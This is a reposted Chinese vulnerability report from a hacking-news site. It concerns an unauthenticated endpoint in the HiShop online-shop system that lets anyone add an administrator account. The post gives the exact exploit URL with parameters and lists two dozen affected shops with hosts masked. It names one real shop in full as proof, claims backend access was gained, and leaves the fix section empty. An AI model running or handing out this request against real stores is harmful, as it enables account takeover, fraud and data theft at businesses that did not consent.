记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

HiShop商城系统存在高危漏洞可直接添加管理员(大量案例)

2015-11-29 13:20

看看百度百科的:



HiShop是国内最大的ASP.NET独立网店服务提供商。长期专注于B2C网上购物软件的研发及相关增值服务的提供。拥有著名网上商店系统品牌——HiShop。公司的主要业务是为中小企业、个人网商及网站站长提供B2C独立购物网站搭建的一站式套餐服务及网店推广、货源提供、个性定制等相关增值服务。



抓包发现如果直接访问:



/Isv.ashx?action=addadmin&adminuser=admin1&adminpassword=111111&guid=2



便可以添加admin2为管理员账户,如果用户存在则添加失败





案例:至少上万商城受影响



mask 区域
1.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_

2.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_

3.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin&adminpassword=111111&guid=1_

4.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin&adminpassword=111111&guid=1_

5.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_

6.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_

7.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_

8.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_

9.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_

10.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_

11.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_

12.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_

13.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_

14.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_

15.http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_

16.http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_

17.http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_

18.http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_

19.http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_

20.http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_

21.http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_

22.http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_

23.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_

24.http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_

*****ore.*****

漏洞证明:

http://www.xihongxuan.com/Isv.ashx?action=addadmin&adminuser=admin1&adminpassword=111111&guid=2



01.jpg





可直接入后台:

02.jpg





我就截图不干别的事情了,希望大家不要用来破坏,不然后果自负~

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0146695

阅读:107334 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“HiShop商城系统存在高危漏洞可直接添加管理员(大量案例)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云